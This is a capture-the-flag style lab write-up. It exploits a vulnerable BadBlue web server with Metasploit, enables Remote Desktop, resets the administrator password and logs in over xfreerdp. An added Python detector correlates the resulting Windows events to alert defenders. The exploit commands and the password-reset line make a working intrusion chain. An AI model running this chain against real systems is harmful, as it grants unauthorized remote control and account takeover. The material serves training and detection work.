Windows: Enabling Remote Desktop

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable application will be accessible at demo.ine.local.

Your task is to fingerprint the vulnerable application using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit Framework. Then enable the RDP service on the target machine and access it using the xfreerdp tool.

Objective: Find and exploit the vulnerable application, then get an RDP session to find the flag!

Note: rdesktop will not work on this setup as it does not support NLA. Please use xfreerdp to connect to the RDP server.

Tools

The best tools for this lab are:

  • Nmap

  • Metasploit Framework

  • xfreerdp

Writeup

nmap -sSVC demo.ine.local

PORT      STATE SERVICE      VERSION
80/tcp    open  http         BadBlue httpd 2.7
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49165/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-06-10T18:08:35
|_  start_date: 2025-06-10T18:06:00

msfconsole
use exploit/windows/http/badblue_passthru
set RHOSTS demo.ine.local
exploit
background

use post/windows/manage/enable_rdp
set session 1
run

sessions -i 1
shell
net user administrator cibaism_05

xfreerdp /u:administrator /p:cibaism_05 /v:demo.ine.local
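
From the defender's side, the steps above leave a recognisable trail on the target: the fDenyTSConnections registry value is set to 0 when Remote Desktop is enabled, an account's password is reset, and a RemoteInteractive logon follows. The Python below is an added example, not part of the original writeup; it correlates those three events per host, and the event records (simplified Sysmon 13 and Security 4724/4624 fields), the host names and the 30-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

RDP_KEY = r"\control\terminal server\fdenytsconnections"
WINDOW = timedelta(minutes=30)  # assumed correlation window

# Constructed sample events (simplified fields, not captured from the lab).
SAMPLE_EVENTS = [
    {"time": "2025-06-10T18:20:01", "host": "TARGET01", "id": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"time": "2025-06-10T18:21:40", "host": "TARGET01", "id": 4724,
     "TargetUserName": "Administrator"},
    {"time": "2025-06-10T18:22:15", "host": "TARGET01", "id": 4624,
     "LogonType": 10, "TargetUserName": "Administrator"},
    {"time": "2025-06-10T19:30:00", "host": "FILESRV", "id": 4624,
     "LogonType": 10, "TargetUserName": "helpdesk"},
]

def classify(ev):
    """Map one event to a stage name, or None if it is not of interest."""
    if ev["id"] == 13 and ev.get("TargetObject", "").lower().endswith(RDP_KEY):
        # Value 0 means terminal-server connections are not denied: RDP is on.
        return "rdp_enabled" if ev.get("Details", "").endswith("(0x00000000)") else None
    if ev["id"] == 4724:                                 # password reset attempt
        return "password_reset"
    if ev["id"] == 4624 and ev.get("LogonType") == 10:   # RemoteInteractive logon
        return "rdp_logon"
    return None

def detect(events, window=WINDOW):
    """Return alerts for hosts where RDP is enabled and then used within window."""
    alerts, enabled = [], {}   # enabled: host -> state of the open sequence
    for ev in sorted(events, key=lambda e: e["time"]):
        stage, host = classify(ev), ev["host"]
        ts = datetime.fromisoformat(ev["time"])
        if stage == "rdp_enabled":
            enabled[host] = {"since": ts, "resets": set()}
        elif host in enabled and ts - enabled[host]["since"] <= window:
            state = enabled[host]
            if stage == "password_reset":
                state["resets"].add(ev["TargetUserName"].lower())
            elif stage == "rdp_logon":
                user = ev["TargetUserName"]
                alerts.append({"host": host, "user": user,
                               "severity": "high" if user.lower() in state["resets"] else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

A "high" alert means the account that logged on over RDP had its password reset after RDP was switched on; "medium" means RDP was enabled and used without a reset in between.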
